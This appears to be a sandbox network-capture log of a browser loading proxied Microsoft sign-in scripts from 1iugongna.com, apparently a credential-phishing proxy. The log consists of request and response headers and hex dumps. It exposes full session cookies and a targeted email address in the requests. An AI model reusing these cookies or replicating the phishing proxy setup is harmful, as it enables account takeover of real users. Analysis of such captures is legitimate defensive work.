                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: script
                                                                              Referer: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com&sso_reload=true
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAA [TRUNCATED]
                                                                              2025-01-10 20:42:02 UTC1384INHTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 20:42:01 GMT
                                                                              Content-Type: application/x-javascript
                                                                              content-length: 57510
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=31536000
                                                                              Content-Encoding: gzip
                                                                              Last-Modified: Sat, 26 Oct 2024 01:33:48 GMT
                                                                              ETag: 0x8DCF55E3D91C34E
                                                                              x-ms-request-id: f59e079f-c01e-0058-3aa5-6024a4000000
                                                                              x-ms-version: 2009-09-19
                                                                              x-ms-lease-status: unlocked
                                                                              x-ms-blob-type: BlockBlob
                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                              Access-Control-Allow-Origin: *
                                                                              x-azure-ref: 20250110T204201Z-155884f84d48b24chC1BL1gam80000000bkg00000000hta2
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
                                                                              2025-01-10 20:42:02 UTC10INData Raw: 1f 8b 08 00 00 00 00 00 00 03
                                                                              Data Ascii:
                                                                              2025-01-10 20:42:02 UTC16334INData Raw: dd 7d 4d 73 23 c7 92 d8 dd bf 02 0f cf f1 86 5c f5 40 f8 e0 27 46 d0 18 04 c0 19 ec 90 00 04 80 33 52 48 32 a2 09 14 c8 7e 04 ba b1 dd 8d e1 f0 51 e3 78 37 1f f6 e0 ab 7d f3 c1 27 1f 7d f1 dd 3f 65 23 d6 bf c3 f9 51 55 5d d5 dd 00 c8 91 56 6f d7 0a c5 10 dd f5 95 95 95 95 95 99 95 99 fd 87 f9 da 9f c6 5e e0 ef 89 fd 47 f5 bb 10 ec f9 fb 8f de 7c cf fb d1 ff 79 3f 14 f1 3a f4 0b f8 bb 24 3e ad 82 30 8e 5e 7d 74 c3 42 dc c0 57 8d 47 f9 ae fe f8 d9 f1 66 75 df 59 04 ee 4c cc ea 7f a8 7c 7e 25 9b 0a 6c 3a 75 17 8b bd 58 f5 e0 c4 4e f2 3b d8 87 07 6e d6 f8 43 39 29 f8 8c c3 78 8d 47 dd 51 50 5a 36 84 13 94 a6 0d 0f fe 5d 35 8a 45 27 d8 2b ef 7f de fb 31 99 86 13 38 1e 00 bf 57 dd 27 28 fd 86 b7 57 81 fe e1 cf e1 be 13 c2 9f a3 7d c7 6d 84 a5 51 1c 7a fe 4d f4
                                                                              Data Ascii: }Ms#\@'F3RH2~Qx7}'}?e#QU]Vo^G|y?:$>0^}tBWGfuYL|~%l:uXN;nC9)xGQPZ6]5E'+18W'(W}mQzM


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              37192.168.2.549891207.174.40.1824432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:42:02 UTC1483OUTGET /aadcdn.msauth.net/~/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_i8f-75gfk3tbsm8bmatnqa2.js HTTP/1.1
                                                                              Host: 1iugongna.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAA [TRUNCATED]
                                                                              2025-01-10 20:42:03 UTC1384INHTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 20:42:02 GMT
                                                                              Content-Type: application/x-javascript
                                                                              content-length: 57510
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=31536000
                                                                              Content-Encoding: gzip
                                                                              Last-Modified: Sat, 26 Oct 2024 01:33:48 GMT
                                                                              ETag: 0x8DCF55E3D91C34E
                                                                              x-ms-request-id: f59e079f-c01e-0058-3aa5-6024a4000000
                                                                              x-ms-version: 2009-09-19
                                                                              x-ms-lease-status: unlocked
                                                                              x-ms-blob-type: BlockBlob
                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                              Access-Control-Allow-Origin: *
                                                                              x-azure-ref: 20250110T204202Z-155884f84d45kgq4hC1BL1c0kn0000000bk000000000p6gk
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
                                                                              2025-01-10 20:42:03 UTC10INData Raw: 1f 8b 08 00 00 00 00 00 00 03
                                                                              Data Ascii:
                                                                              2025-01-10 20:42:03 UTC16334INData Raw: dd 7d 4d 73 23 c7 92 d8 dd bf 02 0f cf f1 86 5c f5 40 f8 e0 27 46 d0 18 04 c0 19 ec 90 00 04 80 33 52 48 32 a2 09 14 c8 7e 04 ba b1 dd 8d e1 f0 51 e3 78 37 1f f6 e0 ab 7d f3 c1 27 1f 7d f1 dd 3f 65 23 d6 bf c3 f9 51 55 5d d5 dd 00 c8 91 56 6f d7 0a c5 10 dd f5 95 95 95 95 95 99 95 99 fd 87 f9 da 9f c6 5e e0 ef 89 fd 47 f5 bb 10 ec f9 fb 8f de 7c cf fb d1 ff 79 3f 14 f1 3a f4 0b f8 bb 24 3e ad 82 30 8e 5e 7d 74 c3 42 dc c0 57 8d 47 f9 ae fe f8 d9 f1 66 75 df 59 04 ee 4c cc ea 7f a8 7c 7e 25 9b 0a 6c 3a 75 17 8b bd 58 f5 e0 c4 4e f2 3b d8 87 07 6e d6 f8 43 39 29 f8 8c c3 78 8d 47 dd 51 50 5a 36 84 13 94 a6 0d 0f fe 5d 35 8a 45 27 d8 2b ef 7f de fb 31 99 86 13 38 1e 00 bf 57 dd 27 28 fd 86 b7 57 81 fe e1 cf e1 be 13 c2 9f a3 7d c7 6d 84 a5 51 1c 7a fe 4d f4
                                                                              Data Ascii: }Ms#\@'F3RH2~Qx7}'}?e#QU]Vo^G|y?:$>0^}tBWGfuYL|~%l:uXN;nC9)xGQPZ6]5E'+18W'(W}mQzM


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              38192.168.2.549893207.174.40.1824432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:42:03 UTC1674OUTGET /aadcdn.msauth.net/~/shared/1.0/content/js/oneDs_641b1cf809bdc17b42ab.js HTTP/1.1
                                                                              Host: 1iugongna.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: script
                                                                              Referer: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com&sso_reload=true
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAA [TRUNCATED]
                                                                              2025-01-10 20:42:03 UTC1406INHTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 20:42:03 GMT
                                                                              Content-Type: application/x-javascript
                                                                              content-length: 190151
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=31536000
                                                                              Content-Encoding: gzip
                                                                              Last-Modified: Thu, 27 Oct 2022 14:24:13 GMT
                                                                              ETag: 0x8DAB826EBE74413
                                                                              x-ms-request-id: 22a49cf0-601e-0020-3887-63b8f1000000
                                                                              x-ms-version: 2009-09-19
                                                                              x-ms-lease-status: unlocked
                                                                              x-ms-blob-type: BlockBlob
                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                              Access-Control-Allow-Origin: *
                                                                              x-azure-ref: 20250110T204203Z-155884f84d46sft9hC1BL1yxu40000000btg0000000089rb
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              X-Cache-Info: L1_T2
                                                                              Accept-Ranges: bytes
                                                                              Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
                                                                              2025-01-10 20:42:03 UTC14978INData Raw: 1f 8b 08 00 00 00 00 00 00 03 cc bd 69 77 db 46 b2 30 fc fd fe 0a 0a 27 57 03 8c da 34 29 2f 71 48 23 bc b2 44 db 4c b4 45 4b 9c 8c ac d1 81 c8 96 04 9b 04 18 00 94 ac 91 f8 df 9f aa ea 1d 04 28 29 c9 7d ef 7b 12 8b 40 a3 7a af ae ae ae ae c5 bf 89 93 51 7a d3 2c f8 98 4f 78 91 dd 9e dd f0 f3 69 34 fc fa 53 9e 26 d3 70 e9 d7 fb fb 93 d3 a0 39 9d e5 57 fe c9 c9 fa 29 3b 61 8c 5d cc 92 61 11 a7 89 cf 59 c1 92 e0 ce 9b e5 bc 91 17 59 3c 2c bc 6e d2 cc fc 22 60 49 73 e4 17 cc fb 35 1a cf f8 cf 50 81 c7 7c 9d 2d b8 cb 78 31 cb 92 46 d6 e4 f3 40 c3 f6 af 79 52 6c 47 05 4f 86 b7 35 e0 51 19 7c 9f 67 79 9c 63 16 5e 93 e5 dc ca 72 94 45 43 be cd af f9 b8 06 78 64 01 6f 4c a7 83 24 8f 2f af 8a 7c 33 cd aa 8b 8f 9d 16 bd 8b 72 5e 0b 6a 17 7d d6 ff 06 4d 1e f1 d1 20
                                                                              Data Ascii: iwF0'W4)/qH#DLEK()}{@zQz,Oxi4S&p9W);a]aYY<,n"`Is5P|-x1F@yRlGO5Q|gyc^rECxdoL$/|3r^j}M
                                                                              2025-01-10 20:42:03 UTC1406INData Raw: 2c 78 b8 67 e4 57 f2 01 8c b1 b2 fd 6f 22 8f de 45 b0 de 85 0d 08 ce 9e 0b aa 1f 8b 11 3c 08 9b 78 48 97 78 46 a5 24 ab d9 bc 5e b4 ed cd 0b ab ad e8 df 24 ba fd 5b b7 2f b7 77 88 4f c2 67 46 4d 1f 0b 75 02 77 fb 58 84 c3 d5 d5 a1 d5 c7 aa bc 89 52 ee 73 55 63 12 54 51 9e 19 a5 98 4c 6c 9b aa 29 7f 81 0e 15 8b c8 b4 6e 6d b8 35 23 fc 77 92 1f 7d c2 7d 60 e9 5a 4e 05 80 55 57 16 ca 64 24 83 8f 7e c9 a2 18 6f be 60 b5 e3 f7 6b ee db cb 3a 66 b6 43 02 28 82 2d f7 ac 41 3e 33 02 d7 52 93 5d 5b 34 e4 fa 89 04 cc b0 a4 8b 56 fe 62 07 43 75 54 db 27 52 61 9c c6 98 e4 50 a6 06 44 5d 6a 06 b3 6a 82 95 ba 93 06 36 1c 95 4e f9 bb 66 f8 2c 4d 84 8f 0d 47 8a 26 24 6d ba 5f e8 23 82 5e ae 0b 25 99 5f 59 dc 77 52 b5 ef 64 61 dc 24 de 4f 1c 01 23 91 79 96 8d 51 e7 a8 6c
                                                                              Data Ascii: ,xgWo"E<xHxF$^$[/wOgFMuwXRsUcTQLl)nm5#w}}`ZNUWd$~o`k:fC(-A>3R][4VbCuT'RaPD]jj6Nf,MG&$m_#^%_YwRda$O#yQl
                                                                              2025-01-10 20:42:03 UTC16384INData Raw: 95 a1 50 20 13 dc 09 ae 34 e2 7c 9d 30 c3 e4 c1 b6 9c ec e3 12 20 93 46 e3 3e 5b 03 ed 8f 67 c0 df fb 78 dd a8 ae 19 4d 00 1b f1 d1 0b 4a 7e 13 a6 94 dc 94 fe 24 50 2d cd 47 c7 3d 85 da e1 a9 62 8c 17 47 aa d5 45 78 07 f5 10 07 b4 78 d7 96 12 fa cd e1 40 53 82 00 82 12 ad ae 46 4d f9 c1 a7 c0 2f 64 02 06 d0 26 7a 72 65 91 74 91 31 d8 a2 52 17 e0 ac 82 55 04 66 ae 27 73 c2 f1 f4 4e 01 40 75 31 14 5d 18 6a c4 18 b2 35 15 0a d7 1f b2 c6 32 9c 55 a1 f8 e4 d6 c7 75 7d aa 14 55 21 35 ef fd 38 ba cc eb 7b 49 9f 4d 47 4b d0 e5 be d2 67 31 94 26 37 0c 28 1e c0 a4 59 3c 4b b5 71 c3 5c 85 c2 bd 2b ec d1 92 4d 17 61 b4 95 83 6f ef 6c 96 7c 4d d2 9b e4 cc 13 1e 9b 94 25 3b 59 f4 98 d7 35 b4 ba 8c f2 2b e1 55 59 58 bd d2 fc fe e1 bb b2 80 60 9e 8b 78 bc 40 3a 5d 23 d7
                                                                              Data Ascii: P 4|0 F>[gxMJ~$P-G=bGExx@SFM/d&zret1RUf'sN@u1]j52Uu}U!58{IMGKg1&7(Y<Kq\+Maol|M%;Y5+UYX`x@:]#
                                                                              2025-01-10 20:42:03 UTC16384INData Raw: cc 68 6f b7 b7 64 ca dd ae 4a d9 e6 94 0f 04 97 4e a7 c2 f3 c0 0e a7 9c 5c a7 49 24 dd 09 ec 72 ca af 8c 88 09 2d 8c 1f 39 e5 34 9e a8 6a 9e 8b 84 db 42 a7 bc 10 4d 31 6e 5a 3c b6 5b a2 db 88 43 dd 12 3d 7d fb d7 30 69 b7 16 fa f8 3e ba 0a 07 54 7e cb df 9f e6 45 7a 1b a9 00 e4 6a 68 f2 b5 bd b5 69 c2 3f 35 45 44 aa 8f 69 2a f6 d3 1c ee fe 11 06 7b 48 f3 40 04 2d 47 ba a3 09 38 bc bd 8d 86 31 dc 16 6c 9b e0 50 7c 7f 9e e4 93 68 00 ab b6 21 cd b3 1c 6c 0b 77 e6 d6 26 55 73 2e 1e b6 90 b0 bb 4d 73 77 2e 1e 76 fc 37 e9 14 ca 0c bb 3e a8 0f 9a 1e 76 57 f0 dc 87 3a 00 b7 fb c2 84 90 d5 be 66 71 11 13 14 69 6f 9a 50 4f 16 3a 3e 3a a0 9e 1c 7c fc 78 fc 91 8a 7e de fb 78 74 78 f4 13 75 e5 f0 e8 ed f1 c7 0f 7b 67 87 c7 47 ed 2d 13 cc 11 ca 6d 0b 35 2b 02 4e 38 96
                                                                              Data Ascii: hodJN\I$r-94jBM1nZ<[C=}0i>T~Ezjhi?5EDi*{H@-G81lP|h!lw&Us.Msw.v7>vW:fqioPO:>:|x~xtxu{gG-m5+N8
                                                                              2025-01-10 20:42:03 UTC2309INData Raw: e8 02 ed b7 1b 30 09 aa 8b f1 66 7d dd 87 be a5 89 29 6d ad 56 10 1e 45 fe f0 c5 b9 27 2d 54 f4 8d b9 67 48 81 d4 bd 69 12 41 b4 ab f6 4a a9 88 ba 2e f7 14 bf d4 b7 af c8 76 f5 ce 84 88 a4 94 5f fe db 53 02 7c b1 3a 29 cc e0 d4 b9 d5 53 c2 5a f1 1f e1 60 c9 b8 fe d9 5f a6 f1 1e 54 72 f7 2c d6 a6 25 92 b2 05 54 5c b4 7c f5 7c 28 37 70 f8 65 05 40 cc 2d 6c 6a bc cc 66 37 ee 9e 80 f9 cc fa e3 37 ef 09 3a dc 42 5c 16 d1 31 a2 c7 eb d1 b0 76 6c d1 e2 73 a3 67 88 37 5c 6a b0 71 e8 99 52 9f ad a4 04 19 38 94 39 82 75 69 60 e7 f4 5c 2a b4 a1 16 43 bd ad 52 4b 99 83 5a 36 cd 5a 4a ba 22 d3 d4 48 d1 25 4a 49 0a 37 39 2a 67 69 94 18 95 d1 95 a2 45 59 7e 67 31 04 91 52 b1 e0 10 44 c8 86 46 78 19 dd 79 81 ef 00 67 8c 2f 7c 47 71 b0 b5 45 aa 18 02 b8 0d 91 67 44 1e 8a
                                                                              Data Ascii: 0f})mVE'-TgHiAJ.v_S|:)SZ`_Tr,%T\||(7pe@-ljf77:B\1vlsg7\jqR89ui`\*CRKZ6ZJ"H%JI79*giEY~g1RDFxyg/|GqEgD
                                                                              2025-01-10 20:42:03 UTC9575INData Raw: ad ed ca 9b db c6 95 fc ff fb 29 6c ee ab 14 39 86 15 49 3e 92 48 c3 a8 14 3b 87 de 24 b6 c7 ce 31 bb 1e 8d 8b 92 28 99 36 45 ea 91 94 9d 4c ec ef be 7d 00 20 40 51 76 de 66 77 6a 1c 91 00 08 82 38 1a dd 8d ee 5f 7b 1d a8 08 37 c9 9e c6 fc 78 83 3b 4c 01 55 73 4a f0 d5 9d e3 41 99 b9 98 91 1a 7f 77 af 49 ff 71 83 d1 66 50 7d 23 9a 43 71 0d b7 23 b8 dd 17 3b ea 36 80 db d6 73 f1 02 ee 2d 85 b0 41 8a 08 d9 e9 b7 ee 3b a2 30 7f 7b c2 1c b5 c2 1e 2d 7b 68 ec 75 51 0e ce ca 33 78 56 c0 06 f7 85 e6 3d 77 45 a1 78 4f 65 ca 21 97 f6 af 51 af b4 ca aa 81 e3 43 0b 65 84 0e ea 64 2a 72 94 27 dd 57 b2 c7 46 34 a3 11 3d 4a 93 53 3c bb 46 15 d3 19 b9 09 78 02 be be 2a 75 a4 56 2f 81 00 5b 13 13 89 23 04 f9 19 52 73 d2 56 b3 f2 98 4c be 28 4c b7 d4 1b 27 b6 de 38 2c 55
                                                                              Data Ascii: )l9I>H;$1(6EL} @Qvfwj8_{7x;LUsJAwIqfP}#Cq#;6s-A;0{-{huQ3xV=wExOe!QCed*r'WF4=JS<Fx*uV/[#RsVL(L'8,U


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              39192.168.2.549892207.174.40.1824432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:42:03 UTC1464OUTGET /aadcdn.msauth.net/~/shared/1.0/content/js/ConvergedLogin_PCore_kAx9qZOSH4g90FNHstHMCA2.js HTTP/1.1
                                                                              Host: 1iugongna.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAA [TRUNCATED]
                                                                              2025-01-10 20:42:03 UTC139INHTTP/1.1 200 OK
                                                                              Content-Length: 689017
                                                                              Content-Type: application/x-javascript
                                                                              Date: Fri, 10 Jan 2025 20:42:03 GMT
                                                                              Connection: close
                                                                              2025-01-10 20:42:03 UTC16245INData Raw: 0a 21 28 66 75 6e 63 74 69 6f 6e 20 28 65 29 20 7b 0a 20 20 66 75 6e 63 74 69 6f 6e 20 6e 28 6e 29 20 7b 0a 20 20 20 20 66 6f 72 20 28 76 61 72 20 74 2c 20 69 2c 20 6f 20 3d 20 6e 5b 30 5d 2c 20 72 20 3d 20 6e 5b 31 5d 2c 20 73 20 3d 20 30 2c 20 63 20 3d 20 5b 5d 3b 20 73 20 3c 20 6f 2e 6c 65 6e 67 74 68 3b 20 73 2b 2b 29 0a 20 20 20 20 20 20 28 69 20 3d 20 6f 5b 73 5d 29 2c 0a 20 20 20 20 20 20 20 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 61 2c 20 69 29 20 26 26 20 61 5b 69 5d 20 26 26 20 63 2e 70 75 73 68 28 61 5b 69 5d 5b 30 5d 29 2c 0a 20 20 20 20 20 20 20 20 28 61 5b 69 5d 20 3d 20 30 29 3b 0a 20 20 20 20 66 6f 72 20 28 74 20 69 6e 20 72 29 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f
                                                                              Data Ascii: !(function (e) { function n(n) { for (var t, i, o = n[0], r = n[1], s = 0, c = []; s < o.length; s++) (i = o[s]), Object.prototype.hasOwnProperty.call(a, i) && a[i] && c.push(a[i][0]), (a[i] = 0); for (t in r) Object.proto
